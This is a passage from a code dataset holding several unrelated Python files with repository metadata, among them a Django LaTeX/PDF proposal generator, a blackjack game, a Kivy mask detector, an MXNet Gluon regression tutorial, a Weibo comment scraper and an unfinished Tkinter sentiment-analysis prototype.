e.message\n msg = e.message\n finally:\n with open(os.path.join(\n dir,\n template.name), 'w') as fp:\n fp.write(output)\n\n return msg\n\n\n def export_textblocks(self):\n \"\"\"Look at all textblocks, produce md files if requested\"\"\"\n r = []\n\n for tb in proposal.models.Textblock.objects.exclude(filename__isnull=True):\n # print(\"textblock production: \", tb)\n\n filename = tb.filename\n if filename[-3:] == \".md\":\n outdir = self.template_dir\n elif filename[-4:] == \".tex\":\n outdir = self.latex_dir\n else:\n filename += \".md\"\n outdir = self.template_dir\n\n with open(os.path.join(outdir,\n filename),\n 'w') as fp:\n fp.write(tb.textblock)\n\n r.append({'obj': {'id': tb.id, 'name': tb.name}, 'result': \"written to disk\"})\n\n return r\n\n def entrypoint(self, **kwargs):\n # print (kwargs)\n r = {'results': []}\n\n self.get_settings()\n\n # ensure that directory exists\n os.makedirs(self.template_dir, mode=0o700, exist_ok=True)\n\n if 'pk' in kwargs:\n try:\n pk = int(kwargs.pop('pk'))\n template = proposal.models.Template.objects.get(pk=int(pk))\n templatelist = [template]\n except:\n from django.core.exceptions import ObjectDoesNotExist\n raise ObjectDoesNotExist\n else:\n templatelist = proposal.models.Template.objects.all()\n\n\n ############\n r['tbresults'] = self.export_textblocks()\n r['bibresults'] = self.export_bibliographies()\n\n ############\n jh = JinjaHandler()\n\n for t in templatelist:\n outdir = self.latex_dir if t.name[-4:] == \".tex\" else self.template_dir\n # print(\"template: \", t, outdir)\n tmp = self.execute_template(\n t, jh, dir=outdir)\n\n r['results'].append({'obj': {'id': t.id, 'name': t.name}, 'result': tmp})\n\n ###############\n\n return r\n\n\nclass CreateLatex(ExecutionView):\n\n template_name = \"create_latex.html\"\n\n def get_settings(self):\n self.template_dir = proposal.models.Setting.get_default('dirs', 'templates')\n self.latex_dir = proposal.models.Setting.get_default('dirs', 'latex')\n self.filters = proposal.models.Setting.get_default('pandoc', 'filters')\n self.extra_args = proposal.models.Setting.get_default('pandoc', 'extra_args')\n\n def run_pandoc(self):\n r = {}\n\n # ensure latexdir exists:\n os.makedirs(self.latex_dir, mode=0o700, exist_ok=True)\n\n # iterate over all md files in templates; run them through pandoc\n p = pathlib.Path(self.template_dir)\n for t in list(p.glob('*.md')):\n # print(\"----------------------------\")\n # print(t)\n r[t.name] = \"ok\"\n\n try:\n\n latex = pypandoc.convert_file(\n t.as_posix(),\n 'latex',\n format=\"md\",\n # outputfile=os.path.join(\n # latex_dir,\n # t.with_suffix('.tex').name),\n extra_args=self.extra_args,\n filters=self.filters,\n )\n latex = re.sub(r\"\\\\includegraphics(\\[.*\\]){/media\", r\"\\includegraphics\\1{media\", latex)\n except Exception as e:\n r[t.name] = \"Error during pandoc conversion: {}\".format(e.__str__())\n latex = \"ERROR\"\n\n output_file = os.path.join(\n self.latex_dir,\n t.with_suffix('.tex').name)\n # print(output_file)\n with open(output_file,\n \"w\") as fp:\n fp.write(latex)\n\n\n return {'results': r}\n\n def entrypoint(self, **kwargs):\n self.get_settings()\n r = self.run_pandoc()\n return r\n \nclass RunPdflatex(ExecutionView):\n\n template_name = \"pdf.html\"\n\n def get_settings(self):\n self.produced_dir = proposal.models.Setting.get_default('dirs', 'producedmedia')\n self.latex_dir = proposal.models.Setting.get_default('dirs', 'latex')\n self.uploaded_dir = proposal.models.Setting.get_default('dirs', 'uploaded')\n self.templates_dir = proposal.models.Setting.get_default('dirs', 'templates')\n self.tarball = proposal.models.Setting.get_default('dirs', 'tarball')\n\n def runcommand(self, *args):\n r = {'warning': '', 'result': None, 'exception': '',}\n print(list(args))\n try:\n compProc = subprocess.run(\n list(args),\n universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n cwd=self.latex_dir,\n )\n\n r['result'] = {'stdout': compProc.stdout, 'stderr': compProc.stderr, 'returncode': compProc.returncode}\n\n except Exception as e:\n r['exception'] += e.__str__()\n return r\n\n def bibtex(self, template):\n return self.runcommand('bibtex', template.name[:-4])\n\n def pdflatex(self, template):\n \"\"\"Run pdflatex once on given template\"\"\"\n return self.runcommand('pdflatex', template.name, '-interaction=nonstopmode')\n\n\n def pdflatex_template(self, template):\n\n r = {'obj': {'id': template.id, 'name': template.name}, 'warning': '', 'result': 'ok'}\n\n if not template.startpoint:\n r['warning'] += \"This template is NOT a startpoint. Unlikely to produce useful results!\"\n\n if not template.name.endswith('.tex'):\n r['warning'] += (\"You are trying to run pdflatex on a non-latex template.\"\n \"This is highly unlikely to produce useful results.\")\n else:\n r['pdf'] = template.name[:-4]+\".pdf\"\n\n if 'pdf' in r:\n # TODO: check that file exists, but it should...\n\n r.update({'run1': self.pdflatex(template)})\n r.update({'bibtex': self.bibtex(template)})\n # r.update({'run2': self.pdflatex(template)})\n # r.update({'run3': self.pdflatex(template)})\n if not os.path.isfile(os.path.join(self.latex_dir, r['pdf'])):\n r['result'] = 'no file generated'\n else:\n r['result'] = 'error'\n\n return r\n\n def link_pdf(self):\n latex_dir = pathlib.Path(self.latex_dir)\n # create symbolic links from media directory to latex dir\n # for produced PDFs\n\n for d in list(latex_dir.glob('*.pdf')):\n print(d)\n try:\n shutil.copy2(d.as_posix(), self.produced_dir)\n except FileExistsError as e:\n print(e)\n pass\n except Exception as e:\n print(e)\n\n def produce_tarball(self):\n\n with tarfile.open(self.tarball, \"w:gz\") as tarfp:\n tarfp.add(self.latex_dir)\n tarfp.add(self.templates_dir)\n tarfp.add(self.uploaded_dir)\n\n\n\n\n def entrypoint(self, **kwargs):\n self.get_settings()\n\n pk = kwargs.pop('pk', None)\n print(pk)\n result = {}\n\n if pk:\n startfiles = [get_object_or_404(proposal.models.Template,\n pk=pk)]\n else:\n startfiles = get_list_or_404(proposal.models.Template,\n startpoint=True)\n\n print(startfiles)\n\n # go to the right directory; do that once for all templates\n\n # produce all pdfs\n result['startfiles'] = [self.pdflatex_template(s)\n for s in startfiles]\n\n self.link_pdf()\n self.produce_tarball()\n\n return result\n\n\nclass getNewPdf(RedirectView):\n\n url = \"/\" + proposal.models.Setting.get_default('dirs', 'producedmedia')\n\n def get_redirect_url(self, *args, **kwargs):\n print(\"In getNewPdf\")\n\n filename = kwargs.get('filename', None)\n if filename:\n template_name = re.sub('.pdf$', '.tex', filename)\n template = get_object_or_404(\n proposal.models.Template,\n name__startswith=template_name,\n startpoint=True\n )\n\n print(\"filename: \", filename, template)\n\n r = {}\n r.update(ExecuteTemplates().entrypoint(**kwargs))\n r.update(CreateLatex().entrypoint(**kwargs))\n r.update(RunPdflatex().entrypoint(pk=template.pk,\n **kwargs))\n\n # TODO: error checking!\n\n # redir = super().get_redirect_url(url = \"/blasdsja\", *args, **kwargs)\n redir = self.url + \"/\" + filename\n print(\"redirecting: \", redir)\n return redir","repo_name":"hkarl/django_propgen","sub_path":"django/proposal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"11462479332","text":"from time import sleep\n\nfrom pycardgame import Deck, PlayerHand, BlackJackRules\n\nblack_jack_symbols = BlackJackRules.SYMBOLS_NAMES\nblack_jack_names = BlackJackRules.NAMES\nblack_jack_win = BlackJackRules.SCORE_WIN\nblack_jack_dealer_score_limit = BlackJackRules.SCORE_DEALER_LIMIT\n\n\ndef main():\n black_jack = Deck(black_jack_symbols, black_jack_names, shake=True, quantity=2)\n while True:\n dealer_hand = PlayerHand()\n player_hand = PlayerHand()\n turn = ''\n print('Card game Black Jack!')\n input('Click Enter for start...')\n dealer_hand.add_card(black_jack.deck_of_cards[0])\n player_hand.add_card(black_jack.deck_of_cards[1])\n dealer_hand.add_card(black_jack.deck_of_cards[2])\n player_hand.add_card(black_jack.deck_of_cards[3])\n del black_jack.deck_of_cards[:4]\n print(f'Your hand: {player_hand}')\n print(f'Your score: {player_hand.score()}')\n while turn.lower() != 'stand':\n turn = input('Your turn (Stand/Hit)... ')\n if turn.lower() == 'hit':\n if player_hand.score() < black_jack_win:\n player_hand.add_card(black_jack.deck_of_cards[0])\n del black_jack.deck_of_cards[0]\n print(f'Your hand: {player_hand}')\n print(f'Your score: {player_hand.score()}')\n if player_hand.score() > black_jack_win:\n print('You lost =(')\n break\n if player_hand.score() == black_jack_win:\n print(f'Your hand: {player_hand}')\n print(f'Your score: {player_hand.score()}')\n print('Congratulations you win!!!')\n break\n\n if turn.lower() == 'stand':\n print(f'Dealer thinking', end='')\n for i in range(3):\n print('.', end='')\n sleep(0.5)\n while dealer_hand.score() < black_jack_dealer_score_limit:\n dealer_hand.add_card(black_jack.deck_of_cards[0])\n del black_jack.deck_of_cards[0]\n print(f'\\nDealer hand: {dealer_hand}')\n print(f'Dealer score: {dealer_hand.score()}')\n if dealer_hand.score() > black_jack_win:\n print('Dealer lost. Congratulations you win!!!')\n elif player_hand.score() >= dealer_hand.score():\n print('Congratulations you win!!!')\n else:\n print('You lost =(')\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Minat004/pyBlackJack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7693676422","text":"from kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.camera import Camera\nfrom kivy.clock import Clock\nfrom kivy.uix.image import Image\nimport cv2\nimport numpy as np\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array # Ajout de cette ligne\nfrom keras.applications.mobilenet_v2 import preprocess_input\n\nimport os\n\n\n# Obtenez le chemin absolu du répertoire de données de votre application\ndata_dir = os.path.abspath(\"face_detector\")\n\n# Utilisez des chemins relatifs depuis le répertoire de données\nfaceNet = cv2.dnn.readNet(os.path.join(data_dir, \"deploy.prototxt\"), os.path.join(data_dir, \"res10_300x300_ssd_iter_140000.caffemodel\"))\nmaskNet = load_model(\"mask_detector.model\")\n\nclass MaskDetectionApp(App):\n def build(self):\n self.camera = Camera(play=True)\n self.camera.resolution = (640, 480)\n self.layout = BoxLayout(orientation=\"vertical\")\n self.layout.add_widget(self.camera)\n self.result_label = Label(text=\"Mask: Unknown\", font_size=24)\n self.layout.add_widget(self.result_label)\n self.capture = None\n Clock.schedule_interval(self.update, 1.0 / 30)\n return self.layout\n\n def update(self, dt):\n frame = self.camera.texture\n if frame:\n data = frame.pixels\n data = np.frombuffer(data, dtype=np.uint8)\n frame = data.reshape(frame.height, frame.width, 4)\n frame = cv2.cvtColor(frame, cv2.COLOR_RGBA2BGR)\n\n # Perform face mask detection here (use your detect_and_predict_mask function)\n (locs, preds) = detect_and_predict_mask(frame, faceNet, maskNet)\n label = \"Masque:détecté\"\n if len(locs) > 0:\n (mask, withoutMask) = preds[0]\n label = \"Masque detecté\" if mask > withoutMask else \"masque non detecté\"\n label = f\"Masque: {label} ({max(mask, withoutMask) * 100:.2f}%)\"\n self.result_label.text = label\n\ndef detect_and_predict_mask(frame, faceNet, maskNet):\n # grab the dimensions of the frame and then construct a blob\n # from it\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(frame, 1.0, (224, 224), (104.0, 177.0, 123.0))\n\n # pass the blob through the network and obtain the face detections\n faceNet.setInput(blob)\n detections = faceNet.forward()\n print(detections.shape)\n\n # initialize our list of faces, their corresponding locations,\n # and the list of predictions from our face mask network\n faces = []\n locs = []\n preds = []\n\n # loop over the detections\n for i in range(0, detections.shape[2]):\n # extract the confidence (i.e., probability) associated with\n # the detection\n confidence = detections[0, 0, i, 2]\n\n # filter out weak detections by ensuring the confidence is\n # greater than the minimum confidence\n if confidence > 0.5:\n # compute the (x, y)-coordinates of the bounding box for\n # the object\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n\n # ensure the bounding boxes fall within the dimensions of\n # the frame\n (startX, startY) = (max(0, startX), max(0, startY))\n (endX, endY) = (min(w - 1, endX), min(h - 1, endY))\n\n # extract the face ROI, convert it from BGR to RGB channel\n # ordering, resize it to 224x224, and preprocess it\n face = frame[startY:endY, startX:endX]\n face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\n face = cv2.resize(face, (224, 224))\n face = img_to_array(face)\n face = preprocess_input(face)\n\n # add the face and bounding boxes to their respective\n # lists\n faces.append(face)\n locs.append((startX, startY, endX, endY))\n\n # only make a prediction if at least one face was detected\n if len(faces) > 0:\n # for faster inference we'll make batch predictions on all\n # faces at the same time rather than one-by-one predictions\n # in the above for loop\n faces = np.array(faces, dtype=\"float32\")\n preds = maskNet.predict(faces, batch_size=32)\n\n # return a 2-tuple of the face locations and their corresponding\n # locations\n return (locs, preds)\n\nif __name__ == '__main__':\n MaskDetectionApp().run()\n","repo_name":"sergetanoh/face_mask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70102662328","text":"from os import path as opath, remove\nimport hashlib\nfrom typing import TypeVar, Callable, AnyStr\n\nT = TypeVar(\"T\")\n\n\nclass File:\n path: str\n name: str\n ext: str\n identity: str\n\n def __init__(self, path: str):\n if not opath.exists(path):\n raise Exception('File {} does not exist!'.format(path))\n if not opath.isfile(path):\n raise Exception('File {} is not actually a file!'.format(path))\n\n self.path = path\n name, ext = opath.splitext(opath.basename(path))\n self.name = name\n self.ext = ext\n self.identity = self.calculate_identity()\n\n def chunk_reducer(self, reducer: Callable[[T, AnyStr | str | bytes], T], init: T, chunk_size: int = 65536) -> T:\n next_iter: T = init\n with open(self.path, 'rb') as file:\n chunk: AnyStr | str | bytes = b'?'\n while chunk:\n chunk = file.read(chunk_size)\n next_iter = reducer(next_iter, chunk)\n return next_iter\n\n def file_hash(self, hash_function) -> str:\n reduced = self.chunk_reducer( # type: ignore\n reducer=hash_reducer,\n init=hash_function\n )\n return reduced.hexdigest()\n\n def sha1(self):\n return self.file_hash(hashlib.sha1())\n\n def md5(self):\n return self.file_hash(hashlib.md5())\n\n def calculate_identity(self):\n return '{}.{}'.format(self.md5(), self.sha1())\n\n def delete(self):\n remove(self.path)\n\n\ndef hash_reducer(hasher, chunk):\n hasher.update(chunk)\n return hasher\n","repo_name":"GaussianWonder/drum-classifier","sub_path":"ai/files/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23855293192","text":"from aws_cdk import (\n aws_lambda as _lambda,\n aws_lambda_python as _lambda_python,\n aws_apigatewayv2 as apigw,\n aws_apigatewayv2_integrations as apigw_int,\n aws_dynamodb as ddb,\n aws_logs as log,\n core\n)\n\nclass AddBluePrintVersion(core.Construct):\n\n def __init__(self, scope: core.Construct, id: str, api: apigw.HttpApi, table: ddb.Table, **kwargs):\n super().__init__(scope, id, **kwargs)\n\n addBluePrintVersion = _lambda_python.PythonFunction(\n self, 'addBluePrintVersion',\n entry='lambda/addBluePrintVersion',\n index='addBluePrintVersion.py',\n runtime=_lambda.Runtime.PYTHON_3_8, \n environment={\n 'TABLE_NAME': table.table_name\n },\n log_retention=log.RetentionDays.ONE_DAY,\n tracing=_lambda.Tracing.ACTIVE,\n )\n\n table.grant_read_write_data(addBluePrintVersion)\n\n updateBluePrintInt = apigw_int.LambdaProxyIntegration(\n handler=addBluePrintVersion\n )\n\n api.add_routes(\n path='/admin/blueprint',\n methods=[apigw.HttpMethod.PUT],\n integration=updateBluePrintInt\n )","repo_name":"photosojourn/vendy","sub_path":"vendy/addBluePrintVersion.py","file_name":"addBluePrintVersion.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43402501061","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'tobin'\n\nimport math\nimport numpy as np\n\ndef real_position(size, image_pos, camera_para, camera_rot, camera_pos):\n T = position_matrix(camera_pos)\n R = rotation_matrix(camera_rot)\n fx, fy = camera_para\n xp, yp = image_pos\n width, height = size\n\n # perspective camera point\n xc = (xp - width / 2) / fx\n yc = (yp - height / 2) / fy\n\n # coordinate transformation point\n zr = 0.915348425339\n xr = xc * zr\n yr = yc * zr\n\n # Vt = R'Vr\n Vr = np.array([[xr, yr, zr, 1.0]])\n Vr = np.transpose(Vr)\n Vt = np.dot(np.linalg.inv(R), Vr)\n # Vo = T'Vt\n Vo = np.dot(np.linalg.inv(T), Vt)\n\n xo, yo, zo, _ = tuple(row[0] for row in Vo)\n return (xo, yo, zo)\n\ndef inner_parameter(size, image_pos, camera_rot, camera_pos, refer_pos):\n xo, yo, zo = refer_pos\n T = position_matrix(camera_pos)\n R = rotation_matrix(camera_rot)\n xp, yp = image_pos\n width, height = size\n\n # scene point\n Vo = np.array([[xo, yo, zo, 1.0]])\n Vo = np.transpose(Vo)\n # Vt = TVo\n Vt = np.dot(T, Vo)\n # Vr = RVt\n Vr = np.dot(R, Vt)\n\n # coordinate transformation point\n xr, yr, zr, _ = tuple(row[0] for row in Vr)\n\n # perspective camera point\n xc, yc = xr / zr, yr / zr\n\n # inner parameter\n fx = (xp - width / 2) / xc\n fy = (yp - height / 2) / yc\n\n return (fx, fy)\n\ndef rotation_matrix(camera_rot):\n alpha, beta, gama = camera_rot\n\n sin_alpha = math.sin(alpha)\n cos_alpha = math.cos(alpha)\n\n sin_beta = math.sin(beta)\n cos_beta = math.cos(beta)\n\n sin_gama = math.sin(gama)\n cos_gama = math.cos(gama)\n\n R = np.array([[cos_beta * cos_gama,\n cos_beta * sin_gama,\n -sin_beta,\n 0.0],\n [sin_alpha * sin_beta * cos_gama - cos_alpha * sin_gama,\n sin_alpha * sin_beta * sin_gama + cos_alpha * cos_gama,\n sin_alpha * cos_beta,\n 0.0],\n [cos_alpha * sin_beta * cos_gama + sin_alpha * sin_gama,\n cos_alpha * sin_beta * sin_gama - sin_alpha * cos_gama,\n cos_alpha * cos_beta,\n 0.0],\n [0.0, 0.0, 0.0, 1.0]])\n return R\n\ndef position_matrix(camera_pos):\n x, y, z = camera_pos\n T = np.array([[1.0, 0.0, 0.0, -x],\n [0.0, 1.0, 0.0, -y],\n [0.0, 0.0, 1.0, -z],\n [0.0, 0.0, 0.0, 1.0]])\n\n return T","repo_name":"skyczhao/silver","sub_path":"Road/test/ipm/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13891162087","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 29 20:42:59 2018\n\n@author: Taylor\n\"\"\"\n\n# Building linear regression with gluon api\n\n\nimport mxnet as mx\nfrom mxnet import nd, gluon, autograd\nmx.random.seed(1)\n\ndata_ctx = mx.cpu()\nmodel_ctx = mx.cpu()\n\n\nnum_inputs = 2\nnum_outputs = 1\nnum_examples = 10000\n\ndef real_fn(X):\n return 2 * X[:, 0] - 3.4 * X[:, 1] + 4.2\n\n\n# what are the defaults for loc and scale? 0 and 1?\n# is the comma in shape of noise necessary?\n# do we need to define the context for these?\nX = nd.random_normal(shape=(num_examples, num_inputs))\nnoise = nd.random_normal(shape=(num_examples,))\ny = real_fn(X) + noise\n\nprint(X.shape)\nprint(noise.shape)\n\n# did we need to specify the data context?\nprint(X.context)\nprint(noise.context)\n\n\n# set up data array and data loader\nbatch_size = 4\narray_dataset = gluon.data.ArrayDataset(X, y)\ntrain_data = gluon.data.DataLoader(array_dataset,\n batch_size=batch_size,\n shuffle=True)\n\n# Now this is where we'll use gluon instead of raw MXNEt\n\n# ?gluon.nn.Dense\n# units is dimensionality of output space\n# in_units is shape/size of input space\n# in_units will be inferred on first forward pass\n# if left blank\nnet = gluon.nn.Dense(1, in_units=2)\n\n# weights and bias are set up for us magically!\nprint(net.weight)\nprint(net.bias)\n\n\n# we can collect all of the parameters of the network like this\nnet.collect_params()\n\n# this returns a dictionary of the parameters (key-value pairs)\ntype(net.collect_params())\n\n# it is important to note that parameters haven't been\n# initialized yet. They just have a place in memory and \n# that is all.\n\n# if we try invoking the model, we'll get an error\nnet(nd.array([[0, 1]]))\n\n\n# we haven't told gluon what the initial values for the \n# parameters should be\n\nnet.collect_params().initialize(mx.init.Normal(sigma=1.), ctx=model_ctx)\n\n# paremeters have now been given an initializer, BUT the\n# network won't actually initialize values for them until\n# the network is called to make a forward pass.\nnet.weight.data()\nnet.bias.data()\n\n# I don't think these above commands were supposed to work\n# but they did...\n\n\n# notice the difference between these manually generated NDArrays\nnd.array([4, 7]).shape # (2,)\nnd.array([[4, 7]]).shape # (1,2)\n\n# the second one from above is what we need to pass data through the model\n# this is just an example of a simple forward pass...\nexample_data = nd.array([[4, 7]])\nnet(example_data) \n# you just call the net like it's a function and it will\n# assume you want to execute a forward pass with that data\n\n# Now we can accss these values (even though we technically could before...)\nprint(net.weight.data())\nprint(net.bias.data())\n\n\n# we didn't have to specify the input shape of this dense network...\n# let's see what that would look like to let gluon infer that info\nnet = gluon.nn.Dense(1)\nnet.collect_params().initialize(mx.init.Normal(sigma=1.), ctx=model_ctx)\n\n\n# define the loss we want to use..\nsquare_loss = gluon.loss.L2Loss()\n# L2 is most common (squared error basically)\n# L1 is next most common (more robust against outliers - absolute error)\n\n\n# optimizer - we don't have to write our own stochastic gradient\n# descent function - just assign it to a gluon.Trainer\n# ?gluon.Trainer\n# http://mxnet.io/api/python/optimization/optimization.html#the-mxnet-optimizer-package\n\nopti_params = {'learning_rate': 0.0001}\ntrainer = gluon.Trainer(params=net.collect_params(), \n optimizer='sgd',\n optimizer_params=opti_params)\n\n# ?trainer.step - just takes batch_size\n\n\n# set up other hyper parameters for training loop\nepochs = 10\nloss_sequence = []\nnum_batches = num_examples / batch_size\n\nfor e in range(epochs):\n cumulative_loss = 0\n #inner loop\n # this for loop below will run the whole data set\n # every time (epoch)\n # it will run 2500 batches of 4 observations (10,000 total)\n for i, (data, label) in enumerate(train_data):\n data = data.as_in_context(model_ctx)\n label = label.as_in_context(model_ctx)\n # record the forward pass and loss calc so we can back prop\n with autograd.record():\n output = net(data)\n loss = square_loss(output, label)\n loss.backward() # this updates parameter gradients\n trainer.step(batch_size)\n # if you don't do asscalar, you'll get an NDArray instead...\n cumulative_loss += nd.mean(loss).asscalar()\n print(\"Epoch %s, loss: %s\" % (e, cumulative_loss / num_batches))\n loss_sequence.append(cumulative_loss)\n\n\nimport matplotlib.pyplot as plt\n\nplt.figure(num=None, figsize=(8,6))\nplt.plot(loss_sequence)\n\n# adding some bells and whistles\nplt.grid(True, which=\"both\")\nplt.xlabel('epoch', fontsize=14)\nplt.ylabel('average loss', fontsize=14)\n\n\nloss_sequence\n\n\n\n# accessing the learned parameters (weights / biases)\nparams = net.collect_params()\n\nprint('The type of \"params\" is a ', type(params))\ntype(params.values())\nprint(params.values())\n\nfor param in params.values():\n print(param.name, param.data())\n\n\n\n\n\n\"\"\"\nNotes:\n \n 1. start with your data you want to train on\n 2. build your DataLoader with a ArrayData - this will\n define the batch size of your data so you can use\n the enumerate() function to capture the correct\n number of X/y observations during training\n 3. build the network with # inputs / # outputs and\n the number of layers desired\n 4. set up the initializer for parameters\n .collect_params().initialize(mx.init.Normal(1.), context=)\n 5. set up the loss function: gluon.loss.L2loss\n 6. set up the trainer/learner/optimizer\n gluon.Trainer(params, optimizer, optimizer_params):\n 1. the params are the output of .collect_params()\n 2. the optimizer is a character string representing the algo ('sgd')\n 3. the optimizer params are parameters for the optimize algo (learning rate)\n 7. set up the training loop:\n 1. loop through each epoch\n 2. enumerate the DataLoader and move data/label into model context\n 3. begin recording for autograd\n 4. forward pass + loss calculation\n 5. OUTSIDE OF RECORDING - .backward()\n 6. Trainer.step - pass in the batch size for proper step\n\"\"\"\n\n\n\n","repo_name":"tjvananne/gluon_mxnet_learning","sub_path":"the_straight_dope/basics/05_linear_regression_with_gluon.py","file_name":"05_linear_regression_with_gluon.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74535208249","text":"def solution(answers):\n answer = []\n\n fst = 0\n sec = 0\n thr = 0\n\n\n secAns = [1, 3, 4, 5]\n thrAns = [3, 1, 2, 4, 5]\n\n for i, n in enumerate(answers):\n\n\n if n == (i+1) % 6:\n fst += 1\n\n if 0 == (i % 2) and n == 2:\n print(2)\n sec += 1\n elif i % 2 and n == secAns[int(i/2)]:\n print(secAns[int(i/2)])\n sec += 1\n\n if n == thrAns[int(i / 2)]:\n thr += 1\n\n\n print(fst, sec, thr)\n\n return answer\n\n\nsolution([1,3,2,4,2])\n\n\n","repo_name":"IhnoH/AlgorithmSolve","sub_path":"PROG_mathRotate.py","file_name":"PROG_mathRotate.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6693367570","text":"from pathlib import Path\n\ndef solveA(data):\n return sum(int(val) for cmd, val in map(str.split, data) if cmd == 'forward') * \\\n sum(int(val) * ((cmd == 'down') - (cmd == 'up')) for cmd, val in map(str.split, data))\n\ndef solveB(data):\n x, y, aim = 0, 0, 0\n for cmd, val in map(str.split, data):\n v = int(val)\n if cmd == 'forward': x, y = x + v, y + v * aim\n elif cmd == 'down': aim += v\n elif cmd == 'up': aim -= v\n return x * y\n\ndef main():\n sampleData = 'forward 5,down 5,forward 8,up 3,down 8,forward 2'.split(',')\n print(solveA(sampleData))\n print(solveB(sampleData))\n\n p = Path(__file__).with_name('input2.txt')\n with p.open('r') as f:\n data = f.readlines()\n print(solveA(data))\n print(solveB(data))\n\nif __name__ == '__main__':\n main()\n","repo_name":"MarcusLassila/AoC-2021","sub_path":"Day2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8307219738","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 28 16:46:19 2017\n\n@author: dell\n\"\"\"\n#动态加载\nimport requests\nimport re\nimport time\n\nii = 10\nwhile ii <= 20:\n ii = ii + 1\n url = 'https://m.weibo.cn/api/comments/show?id=4188633986790962&page=' + str(ii)\n time.sleep(3)\n html = requests.get(url)\n try:\n for jj in range(len(html.json()['data']['data'])):\n data = html.json()['data']['data'][jj]['text']\n with open('weibo.txt', 'a') as ff:\n hanzi = ''.join(re.findall('[\\u4e00-\\u9fa5]', data))\n #print(hanzi)\n ff.write(hanzi + '\\n')\n except:\n None\n \n \n","repo_name":"eshinesimida/weibo","sub_path":"weibo.py","file_name":"weibo.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"41254853409","text":"import pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\n# tkinter for the GUI\r\nimport tkinter as tk\r\nfrom tkinter import Tk, scrolledtext, Label, W, S, E, N, Button, END, Frame, Entry\r\nfrom tkinter.scrolledtext import ScrolledText\r\n\r\nimport random\r\n\r\n\r\nclass Prototype(Frame):\r\n # for the regression\r\n vectorizer = CountVectorizer()\r\n classifier = LogisticRegression()\r\n\r\n instruction_label = Label()\r\n text_frame = ScrolledText()\r\n process_btn = Button()\r\n generate_eval = Button()\r\n doc_entry = Entry()\r\n predicted_label = Label()\r\n predicted_result = Label()\r\n result_description = Label()\r\n\r\n\r\n def __init__(self, master=None):\r\n\r\n super(Prototype, self).__init__()\r\n\r\n self.master = master\r\n self.master.title('App')\r\n self.master.geometry('570x200')\r\n \r\n\r\n # labels\r\n self.instruction_label = Label(self.master, text=\"Inserte un texto para analizar: \")\r\n self.instruction_label.grid(row=0, sticky=W)\r\n\r\n # input\r\n self.text_frame = ScrolledText(self.master, width=45,height=3)\r\n self.text_frame.grid(column=1,row=0)\r\n\r\n # button\r\n self.process_btn = Button(self.master, text =\"Test Microblog\", command = self.test_expression)\r\n self.process_btn.grid(row=1, column =1)\r\n\r\n # charge the predictive model using the data provided\r\n self.generate_eval = Button(self.master, text =\"Load Predictive model\", command = self.load_model)\r\n self.generate_eval.grid(row=2, column =0)\r\n\r\n\r\n # add an entry with the value of the document thats used for changig the data\r\n self.doc_entry = Entry(self.master)\r\n self.doc_entry.grid(row=1, column=0)\r\n self.doc_entry.insert(END, 'prototipo_tweets.csv')\r\n\r\n # add a label for the prediction\r\n self.predicted_label = Label(self.master, text=\"Prediccion: \")\r\n self.predicted_label.grid(row=3, column = 1)\r\n\r\n # add a label for the prediction text\r\n self.predicted_result = Label(self.master, text=\"0\")\r\n self.predicted_result.grid(row=3, column = 2)\r\n\r\n # add a label for the result drescription\r\n self.result_description = Label(self.master, text=\"For purposes of this program 1 is :( and 0 is :)\")\r\n self.result_description.grid(row=4, column = 1)\r\n\r\n def test_expression(self):\r\n self.introduced_text = self.text_frame.get('1.0', END)\r\n # print(self.introduced_text)\r\n\r\n test_string = [self.introduced_text]\r\n # # vectorize\r\n test_string = self.vectorizer.transform(test_string)\r\n\r\n score2 = self.classifier.predict(test_string)\r\n\r\n # print(\"Test Acc: \", score2)\r\n self.predicted_result.configure(text = score2)\r\n # self.predicted_result.configure(text = random.randint(0,1))\r\n\r\n def load_model(self):\r\n df = pd.read_csv('prototipo_tweets.csv')\r\n\r\n text = df['text'].values\r\n y = df['sentiment'].values\r\n\r\n sentences_train, sentences_test, y_train, y_test = train_test_split(text, y, test_size=0.25, random_state=1000)\r\n\r\n \r\n 